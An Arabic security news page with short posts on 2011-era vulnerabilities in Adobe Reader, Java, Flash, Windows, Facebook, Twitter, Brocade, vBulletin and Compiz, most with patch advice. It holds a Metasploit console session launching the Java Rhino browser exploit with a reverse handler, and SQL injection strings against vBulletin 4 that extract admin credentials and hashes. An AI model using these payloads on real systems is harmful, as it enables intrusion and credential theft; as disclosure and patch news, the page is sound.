محتويات التصنيف: "أخبار الثغرات"
ثغرة خطيرة في أدوبي ريدر أكس وأكروبات – CVE-2011-2462
أعلنت شركة أدوبي عن ثغرة خطيرة في أدوبي ريدر أكس وأكروبات. هذه الثغرة يمكنها عمل إنهيار والسماح للمهاجم بالتحكم بالنظام المصاب. هذه الثغرة موجودة في المنتجات التّالية:
– Adobe Reader X (10.1.1) والنسخ السابقة عن 10.x في كل من نظام ويندوز وماكنتوش
– Adobe Reader 9.4.6 والنسخ السابقة عن 9.x في كل من ويندوز، يونكس/لينُكس، وماكنتوش
– Adobe Acrobat X (10.1.1) والنسخ السابقة عن 10.x في كل من ويندوز وماكنتوش
– Adobe Acrobat 9.4.6 والنسخ السابقة عن 9.x في كل من نظام ويندوز وماكنتوش
ملاحظة: أدوبي ريدر للأندرويد والأدوبي فلاش غير مصابين بهذه الثغرة
أدوبي أعلنت إنها ستقوم باصدار ترقيع لكل من Adobe Reader 9.x و Acrobat 9.x قبل نهاية ناريخ 12-12-2011. وأما بخصوص Adobe Reader X و Adobe Acrobat X فإنه سيتم إصدار تحديث لهما وذلك لأنه حسب قول الشركة إنه هذه البرمجيات فيها نظام حماية سيمنع عملية تنفيذ مثل هذه الثغرات على أنظمة الويندوز، وبالتالي التحديث سيكون حسب التحديثات الامنية الربع سنوية في 10-1-2012. باقي الأنظمة سيتم كذلك معالجة الخلل في هذه البرمجيات بحلول 10-1-2012.
طريقة تقليل المخاطر:
النمط المحمي في أدوبي ريدر X والإستعراض المحمي في أدوبي أكروبات X تمنع مثل الثغرات من التنفيذ. للتأكد إنه الإستعراض المحمي مفعل في أكروبات، أذهب الى Edit ثم Preferences ثم Security (Enhanced) وتأكد من “Files from potentially unsafe locations” أو “All files” مع “Enable Enhanced Security” تم عمل إختيار لهم. أما للتأكد من النمط المحمي في أدوبي ريدر X مفعل قم بالذهاب الى Edit ومن ثم Preferences ثم General وتأكد من إختيار “Enable Protected Mode at startup”.
للمزيد يمكن مراجعة نشرة ادوبي الأمنيّة
هاكر يبلغ من العمر 15 عام يكتشف ثغرة جديدة في تويتر
أكتشف شاب يبلغ من العمر فقط خمسة عشر عاماً ثغرة من نوع Cross site scripting او XSS في موقع تويتر الشهير .
هذا الشاب الصغير سن و لكن الكبير خبراً في اكتشاف ثغرات من نوع Xss و يدعى “Belmin Vehabovic” او (~!White!~) كأسم حركي استطاع أن يستغل ثغرة قام باكتشافها بنفسه في تويتر و النجاح في تنفيذ اكواد جافا سكربت مما يمسح بسرقة كوكيز اي مستخدم على تويتر اذا قام بالدخول لصفحة تحتوى على استغلال لهذه الثغرة ..
كما استطاع أيضا باكتشاف ثغرة في موقع فيسبوك من نفس النوع و حصل على 700$ من إدارة موقع الفيس بوك كما ذكر على حسابه الخاص في تويتر
Facebook is finally sending me my money for my Xss Vuln on http://developers.facebook.com/ I’m getting $700 🙂
ثغرة خطيرة في جافا تؤدي إلى اختراق انظمة تشغيل مختلفة
تم اليوم إضافة استغلال لثغرة خطيرة في جافا إلى مشروع ميتاسبلويت. الثغرة كانت متوفرة فقط في السوق السوداء وبشكل تجاري. ولكن الآن أصبحت في متناول الجميع. الثغرة موجودة في الاصدار السابع من جافا والاصدار السادس التحديث السابع والعشرين. أحدث اصدارات جافا (الاصدار السابع التحديث الأول، والاصدار السادس التحديث التاسع والعشرين) تمّ فيها ترقيع الثغرة بالإضافة إلى 19 ثغرة أخرى.
بغض النظر عن نظام التشغيل أو المتصفح المستخدمان، تمكن مطوّروا الاستغلال من استغلال الثغرة واختراق الأنظمة التي تحتوي إصدارة جافا مصابة. وفيما يلي قائمة بالإنظمة التي تم اختبار الاختراق عليها:
أنظمة ويندوز
WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11
نظام ابنتو (كمثال ولكن ينطبق على غيره ما ينطبق عليه)
Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin
أنظمة ماك او اس
OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11
مثال على الاستغلال
msf exploit(handler) > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > info
msf exploit(java_rhino) > set URIPATH xxxx
msf exploit(java_rhino) > exploit
[*] Security For Arabs Exploit running as background job.
[*] Started reverse handler on 10.0.0.11:4444
[*] Using URL: hxxp://0.0.0.0:8080/xxxx
[*] Local IP: hxxp://10.0.0.11:8080/xxxx
[*] Server started.
إذا كنت تستخدم نسخة غير محدّثة من جافا فقم بتحديثها فوراً.
ننصح بزيارة هذا الرابط من اجل فحص الأمان في متصفحك بالإضافة إلى الملحقات ومن ضمنها جافا.
أدوبي تصدر تحديثاً أمنياً للإصلاح 15 ثغرة في Flashplayer
أصدرت شركة Adobe تحديثاً أمنياً جديدا لإصلاح 15 ثغرة أمنية عالية الخطورة في Flashplayer . التحديث يقوم بإصلاح الثغرات التى ظهرت في اصدر 11.0.1.152 و ما قبله في انظمة Windows و Linux و MAC و في اصدار 11.0.1.153 و ما قبلة في انظمة Andorid .
الثغرات صنفت بأنها عالية الخطورة و تؤدي إلى إختراق النظام و تشغيل ملفات ضارة بمجرد زيارة صفحة موقع تحتوى على ملف فلاش الذي يستغل الثغرة , لذلك ننصح بتحديث اصدار مشغل الفلاش لديك الأن إلى الأصدار الأخير لتفادي الإصابة .
يمكن التحديث لمستخدمى متصفحات Internet explorer مباشرة من الروابط التالية :
لمستخدمى متصفحات Opera و Firefox يمكنهم التحديث مباشرة من الروابط التالية :
للأنظمة و المتصفحات الأخرى يمكنك زيارة الرابط التالي : http://get.adobe.com/flashplayer
ثغرة خطيرة في أنظمة ويندوز
اعلنت مايكروسوفت اليوم عن وجود ثغرة خطيرة في أنظمة ويندوز فيستا وما بعده (سواء كان على مستوى الحواسيب الشخصيّة أو الخوادم). هذه الثغرة تمّ اكتشافها من قبل طرف ثالث وتمّ إعلام مايكروسوفت بها. مايكروسوفت قامت باصدار ترقيع لهذه الثغرة ضمن عملية الترقيع الشهريّة والمعروفة بالثلاثاء الأسود لهذا الشهر.
حسب التفاصيل التي نشرت حول الثغرة، فإن طريقة استغلالها تتمّ من خلال ارسال عدد كبير من حزم بروتوكول UDP المهيئة إلى منفذ لا يستمع لأي خدمة، بمعنى آخر إرسال الحزم إلى منفذ مغلق. عندما تتم معالجة هذه الحزم تمّ ملاحظة أن بعض البنى يتمّ الإشارة إليها ولكن لا يتم الغاء الإشارة بشكل صحيح. هذه العملية تخلق حالة لا اتزان تؤدي الى فيض في العدد الصحيح. احدالسيناريوهات الناتجة عن ذلك هو قيام المهاجم بتنفيذ كود عن بعد على حاسوب أو خادم الضحيّة.
الثغرة تمّ تصنيفيها على أنّها ثغرة خطيرة ولكن استغلالها اعطي تصنيف من الدرجة الثانية لصعوبة تنفيذه حيث أنّه يتطلب توافر العديد من العوامل معاً.
أنظمة مايكروسوف مثل XP ويندوز 2003 غير معرّضة لهذه الثغرة.
ننصيح الجميع بالقيام بتثبيت الترقيع في أقرب وقت. في بيئة الشركات ننصح بالقيام بعملية اختبار للترقيع قبل تنفيذه على خوادم العمل.
المصادر: نشرة الأمان حول MS11-083 وتقييم استغلال MS11-083
فيسبوك: ثغرة تسمح بإرسال ملفات تشغيليّة
اكتشف أحد الباحثين الأمنيين الأسبوع الماضي ثغرة تسمح للمهاجم بإرسال ملفات تشغيليّة لأي مستخدم لفيسبوك، دون أن يكون المهاجم من دائرة أصدقاء الضحيّة. لا يمكن لمستخدم إرسال ملفات تشغيلية سواءاً لأصدقائه أو غيرهم. لكن الباحث الأمني عثر على خلل في طريقة التّأكد من الملفات في خاصيّة الرسائل في فيسبوك، وتحديداً في طريقة تحليل الملف لمعرفة إذا ما كان نوع الملف مسموحاً به أو لا.
الباحث قام بعمل تعديل بسيط على اسم الملف، وذلك بإضافة فراغ بعد اسم الملف. لنفرض أنا الملف “test.exe” ملف غير مسموح إرساله كونه ملف تشغيلي. إضافة فراغ بعد اسم الملف تمكن المهاجم من تخطّي حماية فيسبوك وإرسال الملف إلى الضحيّة “test.ext ”
باستغلال الهندسة الإجتماعيّة، يمكن للمهاجم السيطرة على حاسوب الضحيّة في حال قام فتح الملف المرسل.
الباحث قام بتبليغ فيسبوك بالثغرة الشهر الماضي، وقد قام فريق فيسبوك بإغلاقها هذا الشهر.
ثغرة في بطاريّات حواسيب أبل المحمولة
اعلن الباحث الأمني تشارلي ميلر عن اكتشافه لثغرة في حواسيب أبل المحمولة قد تؤدّي إلى اعطاب بطاريّة المحمول، اصابة ببرمجيّات ضارّة أو حتى احراقه. الباحث قال أنّه استطاع الوصول الى طريقة تمكّنه من التّلاعب بقطعة الكترونيّة داخل بطاريات الحواسيب المحمولة لأبل.
هذه القطعة تراقب حرارة البطارية، نسبة الشحن..الخ. القطع يمكن للمهاجم التّحكم فيها من بعد لأنّ كلمة المرور المستخدمة هي الكلمة الإفتراضية والتي يمكن العثور عليه في موقع الشّركة المنتجة (Texas Instruments)، حيث أنّ أبل لم تقم بتغيير هذه الكلمة.
الباحث أعطى مثال لاستغلال هذه الثغرة يسمح للمهاجم بتثبيت برنامج ضار على البطارية، هذا البرنامج لا يمكن لبرامج مكافحة الفيروسات اكتشافه لأنّه غير مخزّن على القرص الصلب. ولهذا فالبرنامج الضّار يمكنه مهاجمة المحمول مرّة تلو المرّة حتى لو تمّ استبدال القرص الصلب. حيث أنّ البطاريّة سوف تستمر في الهجوم.
الباحث أبلغ أبل بالثغرة ولكن لم يحصل على ردّ من الشركة.
ثغرات ال firmware ليست بالأمر الجديد ولكن قد نشهد قريباً ارتفاع في عددها.
ثغرة في عتاد Brocade تؤدّي إلى تجاوز الجدار النّاري
عتاد Brocade يستخدم في العديد من الشركات العالميّة كموجّهات (مثل موجّهات سيسكو وجونيبر). هذا العتاد يدعم الجدر النّاريّة المعروفة بال packet filter. اكتشفت ثغرة في هذا العتاد وتحديداً في محوّلات BigIron RX تسمح بتجاوز الجدار النّاري (ACL) بالكليّة.
الثغرة تسمح للمهاجم بتخطّي الجدار النّاري إذا قام بتغير المنفذ الذي يقوم بالاتصال منه (source port) الى منفذ 179.
مثال: إذا كان الجدار النّاري يمنع أي اتصال خارجي بالخوادم خلف هذا الجدار الى المنافذ 22، 3389، 3306 يمكن للمهاجم الوصول الى هذه المنافذ إذا قام بجعل الحزم التي يرسلها لشبكة الضّحيّة تستخدم المنفذ 179.
العديد من الشركات تفترض أن الحماية التي يقدّمها هذا العتاد كافية، لذلك في بعض الأحيان تتأخر الشّركات في ترقيع خوادمها. يمكن للمهاجم عبر استغلال هذه الثغرة من الوصول إلى هذه الخوادم واختراقها وهو ما يجعل هذه الثّغرة خطيرة.
لم تقم الشركة التي تصنّع هذا العتاد باصدار ترقيع لهذه الثّغرة، لذلك ينصح بعدم الاعتماد على هذا العتاد فقط في منع الوصول الى الشبكة. ينصح مدراء الشبكات والأنظمة باستخدام عتاد أو جدر ناريّة موثوقة للقيام بهذه المهمّة.
(اليوم صفر): ثغرة حقن , CSRF/XSRF في سكريبت المنتديات الشهير Vbulletin تعمل على الإصدار الرابع
مقدمة
تم اكتشاف ثغرة SQL injection و CSRF/XSRF في برنامج إدارة المحتوى الشهير Vbuuletin في محرك البحث الخاص به.
معلومات اختبار الاختراق
نظام التشغيل: جميع أنظمة التشغيل
المنصة: PHP , MySQL
معلومات الثغرة:
البرنامج: http://www.vbulletin.com
الإصدار المصاب: 4.0.x
تكمن التغرة في الملفات محرك البحث و هي
“/vb/search/searchtools.php” في السطر 751
“/packages/vbforum/search/type/socialgroup.php” في السطور 201 إلى 203
الاستغلال:
اذهب إلى محرك البحث , ثم إلى “Search Multiple Content Types“ ثم اختر المجموعات “groups“
وضع التالي في محرك البحث
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
لمزيد من التفاصيل
الحماية:
التحديث الأمني الرسمي من الشركة
vbulletin 4.X Security Batch
تحياتي و احترامي
ثغرة في Compiz
تم الكشف عن ثغرة في برنامج Compiz لتأثيرات سطح المكتب تؤدي إلى انهيار سطح المكتب. الثغرة موجودة في التّوزيعات التّالية:
- Alinex
- BLAG Linux and GNU
- CentOS
- ClearOS
- Debian
- DeMuDi
- Feather Linux
- Fedora
- Foresight Linux
- gnuLinEx
- gNewSense
- Kaella
- Knoppix
- Linspire
- Linux Mint
- Musix GNU/Linux
- Parsix
- Red Hat Enterprise Linux
- Scientific Linux
- SUSE Linux Enterprise Desktop
- Ubuntu
- Ututo
حتى ينجح الاستغلال يقوم المهاجم ببساطة بإنشاء صفحة HTML عاديّة تحتوي على iFrame وعنوان يحتوي على 10 آلاف حرف. إذا تمّ فتح الصفحة باستخدام متصفح يدعم apt:// فسينهار سطح المكتب.
ابنتو قامت بإصدار تحديث لترقيع الثّغرة.
ملاحظة: لا تقم بالضّغط على الرّابط التّالي إلّا إذا كنت لا تخشى من انهيار سطح المكتب لديك. إذا انهار النّظام لديك (بإختيارك 🙂 فالرجاء ان تخبرنا بالتّوزيعة التي تستخدمها وشكراً.
المصادر:
security.goatse.fr
https://bugs.launchpad.net/ubuntu/+source/apturl/+bug/783594